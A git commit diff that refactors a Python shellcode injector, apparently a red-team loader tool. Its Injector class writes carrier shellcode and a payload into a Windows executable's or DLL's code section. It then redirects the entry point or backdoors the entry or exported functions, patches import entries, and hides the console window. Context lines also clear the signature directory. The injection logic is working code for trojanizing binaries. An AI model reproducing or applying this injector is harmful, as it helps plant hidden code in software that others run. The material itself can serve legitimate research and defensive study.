refactor: carrier->injectable so i have sane carrier- & payload locations (+cleaner injector)

This commit is contained in:
Dobin Rutishauser
2024-06-23 14:11:30 +02:00
parent 29db10cbe6
commit e10f9c7fda
8 changed files with 335 additions and 281 deletions
+2 -2
View File
@@ -6,7 +6,7 @@ from model.defs import *
from pe.superpe import SuperPe, PeSection from pe.superpe import SuperPe, PeSection
logger = logging.getLogger("Carrier") logger = logging.getLogger("Injectable")
class IatRequest(): class IatRequest():
@@ -39,7 +39,7 @@ class DataReuseEntry():
self.references.append(DataReuseReference(placeholder, register)) self.references.append(DataReuseReference(placeholder, register))
class Carrier(): class Injectable():
def __init__(self, exe_file: str): def __init__(self, exe_file: str):
self.iat_requests: List[IatRequest] = [] self.iat_requests: List[IatRequest] = []
self.reusedata_fixups: List[DataReuseEntry] = [] self.reusedata_fixups: List[DataReuseEntry] = []
+3 -3
View File
@@ -4,7 +4,7 @@ import shutil
from model.defs import * from model.defs import *
from model.payload import Payload from model.payload import Payload
from model.settings import Settings from model.settings import Settings
from model.carrier import Carrier from model.injectable import Injectable
logger = logging.getLogger("Project") logger = logging.getLogger("Project")
@@ -22,7 +22,7 @@ class Project():
self.comment: str = "" self.comment: str = ""
self.settings: Settings = settings self.settings: Settings = settings
self.payload: Payload = Payload(self.settings.payload_path) self.payload: Payload = Payload(self.settings.payload_path)
self.carrier: Carrier = Carrier(self.settings.inject_exe_in) self.injectable: Injectable = Injectable(self.settings.inject_exe_in)
self.project_dir: str = "" self.project_dir: str = ""
self.project_exe: str = "" self.project_exe: str = ""
@@ -30,7 +30,7 @@ class Project():
def init(self): def init(self):
self.payload.init() self.payload.init()
self.carrier.init() self.injectable.init()
def prepare_project(project_name, settings): def prepare_project(project_name, settings):
+4 -2
View File
@@ -11,15 +11,17 @@ class RangeManager:
self.min = min self.min = min
self.max = max self.max = max
self.intervals.add(Interval(0, min))
def merge_overlaps(self): def merge_overlaps(self):
self.intervals.merge_overlaps(strict=False) self.intervals.merge_overlaps(strict=False)
def print_all(self): def print_all(self):
logger.info("Min: {} Max: {}".format(self.min, self.max)) print("Min: {} Max: {}".format(self.min, self.max))
for i in self.intervals: for i in self.intervals:
logger.info("Interval: {}-{}".format(i.begin, i.end)) print("Interval: {}-{}".format(i.begin, i.end))
def add_range(self, start, end): def add_range(self, start, end):
+2 -59
View File
@@ -5,7 +5,6 @@ from typing import List, Dict
import random import random
from model.defs import * from model.defs import *
from model.rangemanager import RangeManager
logger = logging.getLogger("superpe") logger = logging.getLogger("superpe")
@@ -43,6 +42,7 @@ class SuperPe():
self.iat_entries: Dict[str, IatEntry] = {} self.iat_entries: Dict[str, IatEntry] = {}
self.init_iat_entries() self.init_iat_entries()
def init_iat_entries(self): def init_iat_entries(self):
self.pe.parse_data_directories() self.pe.parse_data_directories()
self.make_iat_entries() self.make_iat_entries()
@@ -234,45 +234,7 @@ class SuperPe():
if exp["name"] == dllfunc: if exp["name"] == dllfunc:
return exp["size"] return exp["size"]
return None return None
## Relocations
def get_rdata_relocmanager(self) -> RangeManager:
section = self.get_section_by_name(".rdata")
relocs = self.get_relocations_for_section(".rdata")
rm = RangeManager(section.virt_addr, section.virt_addr + section.virt_size)
for reloc in relocs:
# Reloc destination is probably 8 bytes
# But i add another 8 to skip over small holes (common in .rdata)
rm.add_range(reloc.rva, reloc.rva + 8 + 8)
if True: # FIXME this is a hack which is sometimes necessary?
sect_data_copy = section.pefile_section.get_data()
string_off = find_first_utf16_string_offset(sect_data_copy)
if string_off == None:
raise Exception("Strings not found in .rdata section, abort")
if string_off < 128:
logging.debug("weird: Strings in .rdata section at offset {} < 100".format(string_off))
string_off = 128
rm.add_range(section.virt_addr, section.virt_addr + string_off)
rm.merge_overlaps()
return rm
def get_relocations_for_section(self, section_name: str) -> List[PeRelocEntry]:
section: PeSection = self.get_section_by_name(section_name)
ret = []
if section is None:
return ret
for reloc in self.get_base_relocs():
reloc_addr = reloc.rva
if reloc_addr >= section.virt_addr and reloc_addr < section.virt_addr + section.virt_size:
#logger.info("ADDR: 0x{:X}".format(reloc_addr))
ret.append(reloc)
return ret
## IAT ## IAT
@@ -389,22 +351,3 @@ class SuperPe():
self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[SuperPe.IMAGE_DIRECTORY_ENTRY_SECURITY].VirtualAddress = 0 self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[SuperPe.IMAGE_DIRECTORY_ENTRY_SECURITY].VirtualAddress = 0
self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[SuperPe.IMAGE_DIRECTORY_ENTRY_SECURITY].Size = 0 self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[SuperPe.IMAGE_DIRECTORY_ENTRY_SECURITY].Size = 0
def find_first_utf16_string_offset(data, min_len=8):
current_string = bytearray()
start_offset = None # To keep track of the start of the current string
for i in range(0, len(data) - 1, 2):
# Check if we have a valid character
if data[i] != 0 or data[i+1] != 0:
if start_offset is None: # Mark the start of a new string
start_offset = i
current_string += bytes([data[i], data[i+1]])
else:
if len(current_string) >= min_len * 2: # Check if the current string meets the minimum length
return start_offset # Return the offset where the string starts
current_string = bytearray()
start_offset = None # Reset start offset for the next string
return None # No string found that meets the criteria
+7 -7
View File
@@ -2,13 +2,13 @@ import os
from typing import List, Dict from typing import List, Dict
from helper import * from helper import *
from model.carrier import Carrier, DataReuseEntry, IatRequest from model.injectable import Injectable, DataReuseEntry, IatRequest
from model.settings import Settings from model.settings import Settings
logger = logging.getLogger("AsmTextParser") logger = logging.getLogger("AsmTextParser")
def parse_asm_text_file(carrier: Carrier, asm_text: str, settings: Settings) -> List[str]: def parse_asm_text_file(injectable: Injectable, asm_text: str, settings: Settings) -> List[str]:
lines_out = [] lines_out = []
lines = asm_text.split("\n") lines = asm_text.split("\n")
@@ -62,7 +62,7 @@ def parse_asm_text_file(carrier: Carrier, asm_text: str, settings: Settings) ->
string_ref = "supermega_payload" string_ref = "supermega_payload"
# should already exist (added before) # should already exist (added before)
datareuse_fixup = carrier.get_reusedata_fixup(string_ref) datareuse_fixup = injectable.get_reusedata_fixup(string_ref)
if datareuse_fixup == None: if datareuse_fixup == None:
raise Exception("Data reuse entry not found: {}".format(string_ref)) raise Exception("Data reuse entry not found: {}".format(string_ref))
@@ -85,7 +85,7 @@ def parse_asm_text_file(carrier: Carrier, asm_text: str, settings: Settings) ->
# just the function name, without __imp_ # just the function name, without __imp_
func_name = line[line.find("__imp_")+6:].rstrip() func_name = line[line.find("__imp_")+6:].rstrip()
placeholder: bytes = os.urandom(6) # exact size or the result placeholder: bytes = os.urandom(6) # exact size or the result
carrier.add_iat_request(func_name, placeholder) injectable.add_iat_request(func_name, placeholder)
new_line = bytes_to_asm_db(placeholder) + " ; IAT Reuse for {}".format(func_name) new_line = bytes_to_asm_db(placeholder) + " ; IAT Reuse for {}".format(func_name)
lines_out.append(new_line) lines_out.append(new_line)
@@ -98,7 +98,7 @@ def parse_asm_text_file(carrier: Carrier, asm_text: str, settings: Settings) ->
if line.startswith("$SG"): if line.startswith("$SG"):
# fuck me. if we start a new definition, and have an old one, add the old one... # fuck me. if we start a new definition, and have an old one, add the old one...
if current_datareuse_entry != None: if current_datareuse_entry != None:
carrier.add_datareuse_fixup(current_datareuse_entry) injectable.add_datareuse_fixup(current_datareuse_entry)
current_datareuse_entry = None # reset it here current_datareuse_entry = None # reset it here
var_name = tokens[0] var_name = tokens[0]
@@ -115,7 +115,7 @@ def parse_asm_text_file(carrier: Carrier, asm_text: str, settings: Settings) ->
continue continue
if current_datareuse_entry != None: if current_datareuse_entry != None:
# when we reach here, $SG with its DB should be done. # when we reach here, $SG with its DB should be done.
carrier.add_datareuse_fixup(current_datareuse_entry) injectable.add_datareuse_fixup(current_datareuse_entry)
current_datareuse_entry = None # reset it here current_datareuse_entry = None # reset it here
# PATCH data reuse code (data from C) # PATCH data reuse code (data from C)
@@ -125,7 +125,7 @@ def parse_asm_text_file(carrier: Carrier, asm_text: str, settings: Settings) ->
## DB 07cH, 04cH, 028H, 0b0H, 006H, 07eH ; IAT Reuse for GetEnvironmentVariableW ## DB 07cH, 04cH, 028H, 0b0H, 006H, 07eH ; IAT Reuse for GetEnvironmentVariableW
if "OFFSET FLAT:$SG" in line: if "OFFSET FLAT:$SG" in line:
string_ref = line.split("OFFSET FLAT:")[1] string_ref = line.split("OFFSET FLAT:")[1]
datareuse_fixup = carrier.get_reusedata_fixup(string_ref) datareuse_fixup = injectable.get_reusedata_fixup(string_ref)
if datareuse_fixup == None: if datareuse_fixup == None:
raise("Data reuse entry not found: {}".format(string_ref)) raise("Data reuse entry not found: {}".format(string_ref))
+3 -3
View File
@@ -9,7 +9,7 @@ from config import config
from observer import observer from observer import observer
from model import * from model import *
from phases.masmshc import masm_shc, Params from phases.masmshc import masm_shc, Params
from model.carrier import Carrier from model.injectable import Injectable
from phases.asmtextparser import parse_asm_text_file from phases.asmtextparser import parse_asm_text_file
from model.settings import Settings from model.settings import Settings
@@ -51,7 +51,7 @@ def compile_dev(
def compile( def compile(
c_in: FilePath, c_in: FilePath,
asm_out: FilePath, asm_out: FilePath,
carrier: Carrier, injectable: Injectable,
settings: Settings, settings: Settings,
): ):
logger.info("-[ Compile C to ASM: {} -> {} ".format(c_in, asm_out)) logger.info("-[ Compile C to ASM: {} -> {} ".format(c_in, asm_out))
@@ -70,7 +70,7 @@ def compile(
asm_text = file_readall_text(asm_out) asm_text = file_readall_text(asm_out)
observer.add_text_file("carrier_asm_orig", asm_text) observer.add_text_file("carrier_asm_orig", asm_text)
asm_text_lines = parse_asm_text_file(carrier, asm_text, settings) # Fixup assembly file asm_text_lines = parse_asm_text_file(injectable, asm_text, settings) # Fixup assembly file
asm_text = masm_shc(asm_text_lines) # Cleanup assembly file asm_text = masm_shc(asm_text_lines) # Cleanup assembly file
observer.add_text_file("carrier_asm_final", asm_text) observer.add_text_file("carrier_asm_final", asm_text)
+302 -198
View File
@@ -4,249 +4,337 @@ import time
import logging import logging
from typing import Dict, List from typing import Dict, List
from model.carrier import Carrier, DataReuseEntry, DataReuseReference from model.injectable import Injectable, DataReuseEntry, DataReuseReference
from pe.pehelper import * from pe.pehelper import *
from observer import observer from observer import observer
from pe.derbackdoorer import FunctionBackdoorer from pe.derbackdoorer import FunctionBackdoorer
from pe.superpe import SuperPe from pe.superpe import SuperPe, PeSection
from model.project import Project from model.project import Project
from model.settings import Settings from model.settings import Settings
from pe.asmdisasm import * from pe.asmdisasm import *
from model.defs import * from model.defs import *
from model.payload import Payload from model.payload import Payload
from model.rangemanager import RangeManager
logger = logging.getLogger("Injector") logger = logging.getLogger("Injector")
def inject_exe(carrier_shc: bytes, settings: Settings, carrier: Carrier, payload: Payload): class Injector():
exe_in = settings.inject_exe_in def __init__(
exe_out = settings.inject_exe_out self,
carrier_invoke_style: CarrierInvokeStyle = settings.carrier_invoke_style carrier_shc: bytes,
settings: Settings,
injectable: Injectable,
payload: Payload):
self.carrier_shc = carrier_shc
self.settings = settings
self.injectable = injectable
self.payload = payload
logger.info("-[ Injecting: into {} -> {}".format(exe_in, exe_out)) # superpe is a representation of the exe file. We gonna modify it, and save it at the end.
self.superpe = SuperPe(settings.inject_exe_in)
self.function_backdoorer = FunctionBackdoorer(self.superpe)
# CHECK if shellcode fits into the target code section # to find space for reference data of carrier (and possibly payload)
carrier_shc_len = len(carrier_shc) self.rdata_rangemanager = self.init_rdata_rangemanager()
#code_sect_size = carrier.superpe.get_code_section().Misc_VirtualSize
#if carrier_shc_len + CODE_INJECT_SIZE_CHECK_ADD > code_sect_size:
# raise Exception("Error: Shellcode size {}+{} too big for target code section {}".format(
# carrier_shc_len, CODE_INJECT_SIZE_CHECK_ADD, code_sect_size
# ))
# superpe is a representation of the exe file. We gonna modify it, and save it at the end. # to find space for carrier and payload
superpe = SuperPe(exe_in) self.payload_rva = None
function_backdoorer = FunctionBackdoorer(superpe) self.carrier_rva = None
self.init_code_rangemanager()
# Patch IAT (if necessary and wanted)
for iatRequest in carrier.get_all_iat_requests():
# skip available
addr = superpe.get_vaddr_of_iatentry(iatRequest.name)
if addr != None:
logger.info("---[ Request IAT {} is available at 0x{:X}".format(
iatRequest.name, addr))
continue
iat_name = superpe.get_replacement_iat_for("KERNEL32.dll", iatRequest.name)
if not settings.fix_missing_iat: ## .rdata rangemanager (relocations and reference data)
raise Exception("Error: {} not available, but fix_missing_iat is False".format(
iatRequest.name))
# do the patch
superpe.patch_iat_entry("KERNEL32.dll", iat_name, iatRequest.name)
#logger.info(" Unavailable IAT {} now patched".format(
# iatRequest.name))
# we modify the IAT raw, so reparsing is required
superpe.pe.parse_data_directories()
superpe.init_iat_entries()
carrier_shc_offset: int = 0 # file offset def init_rdata_rangemanager(self) -> RangeManager:
section = self.superpe.get_section_by_name(".rdata")
relocs = self.get_relocations_for_section(".rdata")
rm = RangeManager(section.virt_addr, section.virt_addr + section.virt_size)
for reloc in relocs:
# Reloc destination is probably 8 bytes
# But i add another 8 to skip over small holes (common in .rdata)
rm.add_range(reloc.rva, reloc.rva + 8 + 8)
if True: # FIXME this is a hack which is sometimes necessary?
sect_data_copy = section.pefile_section.get_data()
string_off = find_first_utf16_string_offset(sect_data_copy)
if string_off == None:
raise Exception("Strings not found in .rdata section, abort")
if string_off < 128:
logging.debug("weird: Strings in .rdata section at offset {} < 100".format(string_off))
string_off = 128
rm.add_range(section.virt_addr, section.virt_addr + string_off)
rm.merge_overlaps()
return rm
# Special case: DLL exported function direct overwrite
if superpe.is_dll() and settings.dllfunc != "" and carrier_invoke_style == CarrierInvokeStyle.ChangeEntryPoint:
logger.warning("---[ Inject DLL: Overwrite exported function {} with shellcode".format(settings.dllfunc))
rva = superpe.getExportEntryPoint(settings.dllfunc)
# Size and sanity checks def get_relocations_for_section(self, section_name: str) -> List[PeRelocEntry]:
function_size = superpe.get_size_of_exported_function(settings.dllfunc) section: PeSection = self.superpe.get_section_by_name(section_name)
if carrier_shc_len >= function_size: ret = []
logger.warning("Shellcode larger than function: {} > {} exported function {}".format( if section is None:
carrier_shc_len, function_size, settings.dllfunc return ret
)) for reloc in self.superpe.get_base_relocs():
reloc_addr = reloc.rva
if reloc_addr >= section.virt_addr and reloc_addr < section.virt_addr + section.virt_size:
#logger.info("ADDR: 0x{:X}".format(reloc_addr))
ret.append(reloc)
return ret
# Inject
carrier_shc_offset = superpe.get_offset_from_rva(rva)
logger.info(f'----[ Using DLL Export "{settings.dllfunc}" at RVA 0x{rva:X} offset 0x{carrier_shc_offset:X} to overwrite')
superpe.pe.set_bytes_at_offset(carrier_shc_offset, carrier_shc)
else: # EXE/DLL ## .text rangemanager
# Put it somewhere in the code section, and rewire the flow
code_section = superpe.get_code_section() def init_code_rangemanager(self) -> RangeManager:
code_section = self.superpe.get_code_section()
if code_section == None: if code_section == None:
raise Exception('Could not find code section in input PE file!') raise Exception('Could not find code section in input PE file!')
sect_size = code_section.Misc_VirtualSize # Better than: SizeOfRawData code_section_size = code_section.Misc_VirtualSize
if sect_size < carrier_shc_len + CODE_INJECT_SIZE_CHECK_ADD:
raise Exception("Shellcode too large: {}+{} > {}".format( # Restrictions for putting data into .text:
carrier_shc_len, CODE_INJECT_SIZE_CHECK_ADD, sect_size # - enough space for carrier + payload
)) # - avoid overwriting entry point function
carrier_shc_offset = int((sect_size - carrier_shc_len) / 2) # centered in the .text section # - carrier should not generate much smaller holes in .text
#shellcode_offset = round_up_to_multiple_of_8(shellcode_offset)
carrier_shc_offset += code_section.PointerToRawData
shellcode_rva = superpe.pe.get_rva_from_offset(carrier_shc_offset)
# Aligning the payload (not carrier!) to page size is important for dll_loader_change rm = RangeManager(
if settings.carrier_name == "dll_loader_change": code_section.VirtualAddress,
# align shellcode_rva minus an offset to page size code_section.VirtualAddress + code_section_size)
shellcode_rva = align_to_page_size(shellcode_rva, carrier_shc_len - len(payload.payload_data))
carrier_shc_offset = superpe.pe.get_offset_from_rva(shellcode_rva) # protect entrypoint a bit
entrypoint_rva = self.superpe.get_entrypoint()
rm.add_range(
entrypoint_rva - 0x100,
entrypoint_rva + 0x100)
# TECHNIQUE0:
# assume payload is big, find a place for it, then prepend carrier (small)
complete_size = len(self.carrier_shc) + len(self.payload.payload_data) + 4096
logger.info("--[ Inject: Write Carrier to 0x{:X} (0x{:X})".format( largest_gap = rm.find_holes(complete_size)
shellcode_rva, carrier_shc_offset)) if len(largest_gap) == 0:
raise Exception('No hole found in code section to fit payload!')
largest_gap_size = largest_gap[0][1] - largest_gap[0][0]
# Copy the shellcode # align to center
superpe.pe.set_bytes_at_offset(carrier_shc_offset, carrier_shc) offset = int((largest_gap_size - complete_size) / 2) # centered in the .text section
offset += largest_gap[0][0]
# rewire flow if self.settings.carrier_name == "dll_loader_change":
if superpe.is_dll() and settings.dllfunc != "": # DLL # Align to page size
if carrier_invoke_style == CarrierInvokeStyle.ChangeEntryPoint: offset = offset & 0xFFFFF000
# Handled above
raise Exception("We should not land here")
elif carrier_invoke_style == CarrierInvokeStyle.BackdoorCallInstr: # page aligned possibly
addr = superpe.getExportEntryPoint(settings.dllfunc) self.payload_rva = offset
logger.info("---( Inject DLL: Backdoor {} (0x{:X})".format(
settings.dllfunc, addr))
function_backdoorer.backdoor_function(addr, shellcode_rva, carrier_shc_len)
else: # EXE # prepend it a bit
if carrier_invoke_style == CarrierInvokeStyle.ChangeEntryPoint: self.carrier_rva = offset - len(self.payload.payload_data) - 4096
logger.info("---( Inject EXE: Change Entry Point to 0x{:X}".format(
shellcode_rva))
superpe.set_entrypoint(shellcode_rva)
elif carrier_invoke_style == CarrierInvokeStyle.BackdoorCallInstr: return rm
addr = superpe.get_entrypoint()
logger.info("---( Inject EXE: Backdoor function at entrypoint (0x{:X})".format(
addr))
function_backdoorer.backdoor_function(addr, shellcode_rva, carrier_shc_len)
logger.info("--( Fix imports and make carrier reference IAT")
injected_fix_iat(superpe, carrier)
logger.info("--( Insert and reference carrier data")
injected_fix_data(superpe, carrier,
carrier_shc_offset + carrier_shc_len + 4096)
# changes from console to UI (no console window) if necessary
superpe.patch_subsystem()
# We done
logger.info("--( Write to file: {}".format(exe_out))
superpe.write_pe_to_file(exe_out)
# Log
code = file_readall_binary(exe_out)
in_code = code[carrier_shc_offset:carrier_shc_offset+carrier_shc_len]
observer.add_code_file("carrier_exe", in_code)
def injected_fix_iat(superpe: SuperPe, carrier: Carrier): ## Inject
"""replace IAT-placeholders in shellcode with call's to the IAT"""
code = superpe.get_code_section_data() def inject_exe(self):
for iatRequest in carrier.get_all_iat_requests(): exe_in = self.settings.inject_exe_in
for placeholder in iatRequest.references: exe_out = self.settings.inject_exe_out
if not placeholder in code: carrier_invoke_style: CarrierInvokeStyle = self.settings.carrier_invoke_style
raise Exception("IatResolve ID {} not found, abort".format(placeholder))
offset_from_code = code.index(placeholder) logger.info("-[ Injecting: into {} -> {}".format(exe_in, exe_out))
# Note that the SuperPe may already have been patched for new IAT imports # Patch IAT (if necessary and wanted)
destination_virtual_address = superpe.get_vaddr_of_iatentry(iatRequest.name) self.injectable_patch_iat()
if destination_virtual_address == None:
raise Exception("IatResolve: Function {} not found".format(iatRequest.name)) # DEL BOTH
carrier_shc_len = len(self.carrier_shc)
instruction_virtual_address = offset_from_code + carrier.superpe.get_image_base() + carrier.superpe.get_code_section().VirtualAddress carrier_offset: int = 0 # file offset
logger.info(" Replace {} at VA 0x{:X} with: call to IAT at VA 0x{:X} ({})".format(
placeholder.hex(), # Special case: DLL exported function direct overwrite
instruction_virtual_address, if self.superpe.is_dll() and self.settings.dllfunc != "" and carrier_invoke_style == CarrierInvokeStyle.ChangeEntryPoint:
destination_virtual_address, logger.warning("---[ Inject DLL: Overwrite exported function {} with shellcode".format(settings.dllfunc))
iatRequest.name rva = self.superpe.getExportEntryPoint(self.settings.dllfunc)
))
jmp = assemble_relative_call(instruction_virtual_address, destination_virtual_address) # Size and sanity checks
if len(jmp) != len(placeholder): function_size = self.superpe.get_size_of_exported_function(self.settings.dllfunc)
raise Exception("IatResolve: Call to IAT has different length than placeholder: {} != {} abort".format( if carrier_shc_len >= function_size:
len(jmp), len(placeholder) logger.warning("Shellcode larger than function: {} > {} exported function {}".format(
carrier_shc_len, function_size, self.settings.dllfunc
)) ))
code = code.replace(placeholder, jmp)
superpe.write_code_section_data(code) # Inject
carrier_offset = self.superpe.get_offset_from_rva(rva)
logger.info(f'----[ Using DLL Export "{self.settings.dllfunc}" at RVA 0x{rva:X} offset 0x{carrier_offset:X} to overwrite')
self.superpe.pe.set_bytes_at_offset(carrier_offset, self.carrier_shc)
else: # EXE/DLL
carrier_offset = self.superpe.get_offset_from_rva(self.carrier_rva)
logger.info("--[ Inject: Write Carrier to 0x{:X} (0x{:X})".format(
self.carrier_rva, carrier_offset))
# Copy the carrier
self.superpe.pe.set_bytes_at_offset(carrier_offset, self.carrier_shc)
# rewire flow to the carrier
if self.superpe.is_dll() and self.settings.dllfunc != "": # DLL
if carrier_invoke_style == CarrierInvokeStyle.ChangeEntryPoint:
# Handled above
raise Exception("We should not land here")
elif carrier_invoke_style == CarrierInvokeStyle.BackdoorCallInstr:
addr = self.superpe.getExportEntryPoint(self.settings.dllfunc)
logger.info("---( Inject DLL: Backdoor {} (0x{:X})".format(
self.settings.dllfunc, addr))
self.function_backdoorer.backdoor_function(
addr, self.carrier_rva, carrier_shc_len)
else: # EXE
if carrier_invoke_style == CarrierInvokeStyle.ChangeEntryPoint:
logger.info("---( Inject EXE: Change Entry Point to 0x{:X}".format(
self.carrier_rva))
self.superpe.set_entrypoint(self.carrier_rva)
elif carrier_invoke_style == CarrierInvokeStyle.BackdoorCallInstr:
addr = self.superpe.get_entrypoint()
logger.info("---( Inject EXE: Backdoor function at entrypoint (0x{:X})".format(
addr))
self.function_backdoorer.backdoor_function(
addr, self.carrier_rva, carrier_shc_len)
logger.info("--( Fix imports and make carrier reference IAT")
self.injectable_write_iat_references()
logger.info("--( Insert and reference carrier data")
self.inject_and_reference_data()
# changes from console to UI (no console window) if necessary
self.superpe.patch_subsystem()
# We done
logger.info("--( Write to file: {}".format(exe_out))
self.superpe.write_pe_to_file(exe_out)
# Log
code = file_readall_binary(exe_out)
in_code = code[carrier_offset:carrier_offset+carrier_shc_len]
observer.add_code_file("carrier_exe", in_code)
def injected_fix_data(superpe: SuperPe, carrier: Carrier, shellcode_offset: int): def injectable_patch_iat(self):
"""Inject data into .rdata/.text and replace reusedata_fixup placeholders in code with LEA""" # Patch IAT (if necessary and wanted)
reusedata_fixups: List[DataReuseEntry] = carrier.get_all_reusedata_fixups() for iatRequest in self.injectable.get_all_iat_requests():
if len(reusedata_fixups) == 0: # skip available
# nothing todo addr = self.superpe.get_vaddr_of_iatentry(iatRequest.name)
return if addr != None:
logger.info("---[ Request IAT {} is available at 0x{:X}".format(
# .rdata storage manager iatRequest.name, addr))
rdata_section = carrier.superpe.get_section_by_name(".rdata") continue
if rdata_section == None: iat_name = self.superpe.get_replacement_iat_for("KERNEL32.dll", iatRequest.name)
raise Exception("No .rdata section found, abort")
rm = carrier.superpe.get_rdata_relocmanager()
# insert data if not self.settings.fix_missing_iat:
logger.info("---( DataReuseFixups: Inject the data") raise Exception("Error: {} not available, but fix_missing_iat is False".format(
for datareuse_fixup in reusedata_fixups: iatRequest.name))
logger.debug(" Handling DataReuse Fixup: {} (.code: {})".format( # do the patch
datareuse_fixup.string_ref, datareuse_fixup.in_code)) self.superpe.patch_iat_entry("KERNEL32.dll", iat_name, iatRequest.name)
#logger.info(" Unavailable IAT {} now patched".format(
# iatRequest.name))
# we modify the IAT raw, so reparsing is required
self.superpe.pe.parse_data_directories()
self.superpe.init_iat_entries()
if datareuse_fixup.in_code: # .text
superpe.pe.set_bytes_at_offset(shellcode_offset, datareuse_fixup.data)
payload_rva = superpe.pe.get_rva_from_offset(shellcode_offset)
datareuse_fixup.addr = payload_rva + carrier.superpe.get_image_base()
logging.info(" Add to .text at 0x{:X} ({}): {} with size {}".format(
datareuse_fixup.addr, payload_rva, datareuse_fixup.string_ref, len(datareuse_fixup.data)))
else: # .rdata def injectable_write_iat_references(self):
# get a hole in the .rdata section to put our data """replace IAT-placeholders in shellcode with call's to the IAT"""
hole_rva = rm.find_hole(len(datareuse_fixup.data)) code = self.superpe.get_code_section_data()
if hole_rva == None: for iatRequest in self.injectable.get_all_iat_requests():
raise Exception("No suitable hole with size {} found in .rdata section, abort".format( for placeholder in iatRequest.references:
len(datareuse_fixup.data) if not placeholder in code:
raise Exception("IatResolve ID {} not found, abort".format(placeholder))
offset_from_code = code.index(placeholder)
# Note that the SuperPe may already have been patched for new IAT imports
destination_virtual_address = self.superpe.get_vaddr_of_iatentry(iatRequest.name)
if destination_virtual_address == None:
raise Exception("IatResolve: Function {} not found".format(iatRequest.name))
instruction_virtual_address = offset_from_code + self.injectable.superpe.get_image_base() + self.superpe.get_code_section().VirtualAddress
logger.info(" Replace {} at VA 0x{:X} with: call to IAT at VA 0x{:X} ({})".format(
placeholder.hex(),
instruction_virtual_address,
destination_virtual_address,
iatRequest.name
)) ))
rm.add_range(hole_rva[0], hole_rva[1]+1) # mark it as used jmp = assemble_relative_call(instruction_virtual_address, destination_virtual_address)
if len(jmp) != len(placeholder):
raise Exception("IatResolve: Call to IAT has different length than placeholder: {} != {} abort".format(
len(jmp), len(placeholder)
))
code = code.replace(placeholder, jmp)
var_data = datareuse_fixup.data self.superpe.write_code_section_data(code)
data_rva = hole_rva[0]
superpe.pe.set_bytes_at_rva(data_rva, var_data)
datareuse_fixup.addr = data_rva + carrier.superpe.get_image_base()
logging.info(" Add to .rdata at 0x{:X} ({}): {}: {}".format(
datareuse_fixup.addr, data_rva, datareuse_fixup.string_ref, ui_string_decode(var_data)))
# replace the placeholder in .text with a LEA instruction to the data we written above
logger.info("---( Datareusefixups: patch code to reference the data") def inject_and_reference_data(self):
code = superpe.get_code_section_data() """Inject data into .rdata/.text and replace reusedata_fixup placeholders in code with LEA"""
for datareuse_fixup in reusedata_fixups: reusedata_fixups: List[DataReuseEntry] = self.injectable.get_all_reusedata_fixups()
ref: DataReuseReference if len(reusedata_fixups) == 0:
for ref in datareuse_fixup.references: # nothing todo
if not ref.placeholder in code: return
raise Exception("fix data in injectable: DataReuse: ID {} ({}) not found in code section, abort".format(
ref.placeholder.hex(), datareuse_fixup.string_ref)) shellcode_offset = self.superpe.pe.get_offset_from_rva(self.payload_rva)
offset_from_datasection = code.index(ref.placeholder) # insert data
instruction_virtual_address = offset_from_datasection + carrier.superpe.get_image_base() + carrier.superpe.get_code_section().VirtualAddress logger.info("---( DataReuseFixups: Inject the data")
destination_virtual_address = datareuse_fixup.addr for datareuse_fixup in reusedata_fixups:
logger.info(" Replace bytes {} at VA 0x{:X} with: LEA {} .rdata 0x{:X}".format( logger.debug(" Handling DataReuse Fixup: {} (.code: {})".format(
ref.placeholder.hex(), instruction_virtual_address, ref.register, destination_virtual_address datareuse_fixup.string_ref, datareuse_fixup.in_code))
))
lea = assemble_lea( if datareuse_fixup.in_code: # .text
instruction_virtual_address, destination_virtual_address, ref.register self.superpe.pe.set_bytes_at_offset(shellcode_offset, datareuse_fixup.data)
) payload_rva = self.superpe.pe.get_rva_from_offset(shellcode_offset)
asm_disasm(lea, instruction_virtual_address) # DEBUG datareuse_fixup.addr = payload_rva + self.injectable.superpe.get_image_base()
if len(lea) != len(ref.placeholder): logging.info(" Add to .text at 0x{:X} ({}): {} with size {}".format(
raise Exception("DataReuseFixup: lea instr has different length than placeholder: {} != {} abort".format( datareuse_fixup.addr, payload_rva, datareuse_fixup.string_ref, len(datareuse_fixup.data)))
len(lea), len(ref.placeholder)
else: # .rdata
# get a hole in the .rdata section to put our data
hole_rva = self.rdata_rangemanager.find_hole(len(datareuse_fixup.data))
if hole_rva == None:
raise Exception("No suitable hole with size {} found in .rdata section, abort".format(
len(datareuse_fixup.data)
))
self.rdata_rangemanager.add_range(hole_rva[0], hole_rva[1]+1) # mark it as used
var_data = datareuse_fixup.data
data_rva = hole_rva[0]
self.superpe.pe.set_bytes_at_rva(data_rva, var_data)
datareuse_fixup.addr = data_rva + self.injectable.superpe.get_image_base()
logging.info(" Add to .rdata at 0x{:X} ({}): {}: {}".format(
datareuse_fixup.addr, data_rva, datareuse_fixup.string_ref, ui_string_decode(var_data)))
# replace the placeholder in .text with a LEA instruction to the data we written above
logger.info("---( Datareusefixups: patch code to reference the data")
code = self.superpe.get_code_section_data()
for datareuse_fixup in reusedata_fixups:
ref: DataReuseReference
for ref in datareuse_fixup.references:
if not ref.placeholder in code:
raise Exception("fix data in injectable: DataReuse: ID {} ({}) not found in code section, abort".format(
ref.placeholder.hex(), datareuse_fixup.string_ref))
offset_from_datasection = code.index(ref.placeholder)
instruction_virtual_address = offset_from_datasection + self.superpe.get_image_base() + self.superpe.get_code_section().VirtualAddress
destination_virtual_address = datareuse_fixup.addr
logger.info(" Replace bytes {} at VA 0x{:X} with: LEA {} .rdata 0x{:X}".format(
ref.placeholder.hex(), instruction_virtual_address, ref.register, destination_virtual_address
)) ))
code = code.replace(ref.placeholder, lea) lea = assemble_lea(
instruction_virtual_address, destination_virtual_address, ref.register
)
asm_disasm(lea, instruction_virtual_address) # DEBUG
if len(lea) != len(ref.placeholder):
raise Exception("DataReuseFixup: lea instr has different length than placeholder: {} != {} abort".format(
len(lea), len(ref.placeholder)
))
code = code.replace(ref.placeholder, lea)
superpe.write_code_section_data(code) self.superpe.write_code_section_data(code)
def verify_injected_exe(exefile: FilePath, dllfunc="") -> int: def verify_injected_exe(exefile: FilePath, dllfunc="") -> int:
@@ -266,3 +354,19 @@ def verify_injected_exe(exefile: FilePath, dllfunc="") -> int:
return 1 return 1
def find_first_utf16_string_offset(data, min_len=8):
